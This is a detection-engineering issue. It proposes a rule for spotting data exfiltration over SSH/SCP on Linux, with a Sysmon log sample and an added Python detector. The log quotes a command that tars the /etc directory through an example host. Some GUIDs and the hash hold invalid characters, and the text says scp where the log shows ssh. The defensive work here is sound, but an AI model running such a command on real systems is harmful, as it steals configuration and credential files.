
Exfiltration Over Alternative Protocol - Linux

Open CheraghiMilad opened this issue 4 months ago • 5 comments

When examining the Exfiltration Over Alternative Protocol technique, an attacker can use the scp command in Linux to dump OS credentials. According to the log generated by Sysmon for Linux, the following log entries are produced when the scp command is executed.

Sample Sysmon for Linux log:

Oct 6 18:33:59 ubuntu sysmon: <Event><System><Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/><EventID>1</EventID><Version>5</Version><Level>4</Level><Task>1</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime="2024-10-06T15:03:59.774949000Z"/><EventRecordID>4341</EventRecordID><Correlation/><Execution ProcessID="11362" ThreadID="11362"/><Channel>Linux-Sysmon/Operational</Channel><Computer>ubuntu</Computer><Security UserId="0"/></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2024-10-06 15:03:59.763</Data><Data Name="ProcessGuid">{7855304e-m6df-6702-f11a-ft3e65590000}</Data><Data Name="ProcessId">13439</Data><Data Name="Image">/usr/bin/ssh</Data><Data Name="FileVersion">-</Data><Data Name="Description">-</Data><Data Name="Product">-</Data><Data Name="Company">-</Data><Data Name="OriginalFileName">-</Data><Data Name="CommandLine">ssh target.example.com (cd /etc && tar -zcvf - *)</Data><Data Name="CurrentDirectory">/tmp</Data><Data Name="User">root</Data><Data Name="LogonGuid">{78a6704r-0000-0000-0000-000000000000}</Data><Data Name="LogonId">0</Data><Data Name="TerminalSessionId">4294967295</Data><Data Name="IntegrityLevel">no level</Data><Data Name="Hashes">SHA256=950fcc37f70c18932935e0e1b1cavfsdsbfd278c60f1cfeb2d4ceb9d642073ff</Data><Data Name="ParentProcessGuid">{78a6384e-a6df-6702-9569-a9a24d590000}</Data><Data Name="ParentProcessId">13437</Data><Data Name="ParentImage">/usr/bin/dash</Data><Data Name="ParentCommandLine">sh</Data><Data Name="ParentUser">root</Data></EventData></Event>

Based on the log details, it can be assessed that if the image equals scp and the command line includes details from Linux compressors, it can be monitored as a specific rule.


CheraghiMilad, Oct 06 '24 17:10
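As an added example (not code from the issue or from SigmaHQ), the detection logic the issue proposes, run over constructed Sysmon for Linux lines modelled on the quoted event: process-create events whose Image is a remote-copy tool and whose CommandLine names a compressor. The image list, the compressor list and the regex-based field extraction are assumptions made for this example.

```python
import html
import re

# Sysmon for Linux emits one XML <Event> per syslog line, with fields such as
# <Data Name="Image">/usr/bin/ssh</Data>. A regex is used instead of an XML parser
# so that lines with unescaped characters (as in the issue's rendering) still parse.
DATA_RE = re.compile(r'<Data Name="([^"]+)">(.*?)</Data>', re.S)
EVENT_ID_RE = re.compile(r"<EventID>(\d+)</EventID>")

# Assumed lists (not from the issue): remote-copy images to watch, and compressor
# names whose presence in CommandLine the issue proposes as the second condition.
REMOTE_COPY_IMAGES = ("/scp", "/ssh", "/sftp")
COMPRESSOR_RE = re.compile(r"\b(tar|gzip|bzip2|xz|zip|zstd|7z)\b")


def parse_sysmon_line(line):
    """Return a dict of EventID plus every EventData field, or None if not an event."""
    m = EVENT_ID_RE.search(line)
    if not m:
        return None
    event = {"EventID": int(m.group(1))}
    for name, value in DATA_RE.findall(line):
        event[name] = html.unescape(value)  # &amp;&amp; -> &&
    return event


def is_exfil_over_ssh(event):
    """Process create (EventID 1) + remote-copy image + compressor in the command line."""
    if event is None or event.get("EventID") != 1:
        return False
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "").lower()
    return image.endswith(REMOTE_COPY_IMAGES) and COMPRESSOR_RE.search(cmd) is not None


def scan(lines):
    """Return (ProcessId, Image, CommandLine) for each line the rule fires on."""
    hits = []
    for line in lines:
        ev = parse_sysmon_line(line)
        if is_exfil_over_ssh(ev):
            hits.append((ev.get("ProcessId"), ev["Image"], ev["CommandLine"]))
    return hits


# Constructed samples: the first mirrors the issue's event (trimmed to the fields the
# rule reads); the second and third are benign controls; the fourth shows that an
# archive name in scp arguments also satisfies the word-boundary match.
SAMPLE_LOGS = [
    'Oct 6 18:33:59 ubuntu sysmon: <Event><System><EventID>1</EventID></System><EventData><Data Name="ProcessId">13439</Data><Data Name="Image">/usr/bin/ssh</Data><Data Name="CommandLine">ssh target.example.com (cd /etc &amp;&amp; tar -zcvf - *)</Data><Data Name="User">root</Data></EventData></Event>',
    'Oct 6 18:34:10 ubuntu sysmon: <Event><System><EventID>1</EventID></System><EventData><Data Name="ProcessId">13450</Data><Data Name="Image">/usr/bin/ssh</Data><Data Name="CommandLine">ssh admin@bastion.example.internal uptime</Data></EventData></Event>',
    'Oct 6 18:34:22 ubuntu sysmon: <Event><System><EventID>1</EventID></System><EventData><Data Name="ProcessId">13461</Data><Data Name="Image">/usr/bin/tar</Data><Data Name="CommandLine">tar -zcvf /tmp/logs.tgz /var/log</Data></EventData></Event>',
    'Oct 6 18:35:01 ubuntu sysmon: <Event><System><EventID>1</EventID></System><EventData><Data Name="ProcessId">13470</Data><Data Name="Image">/usr/bin/scp</Data><Data Name="CommandLine">scp /tmp/etc.tar.gz user@host.example.com:/tmp/</Data></EventData></Event>',
]
```

The second control line shows why the Image condition alone is too broad for a Sigma rule on ssh, while the fourth shows the compressor-name condition will also match archives passed to scp by name, which a rule author may or may not want.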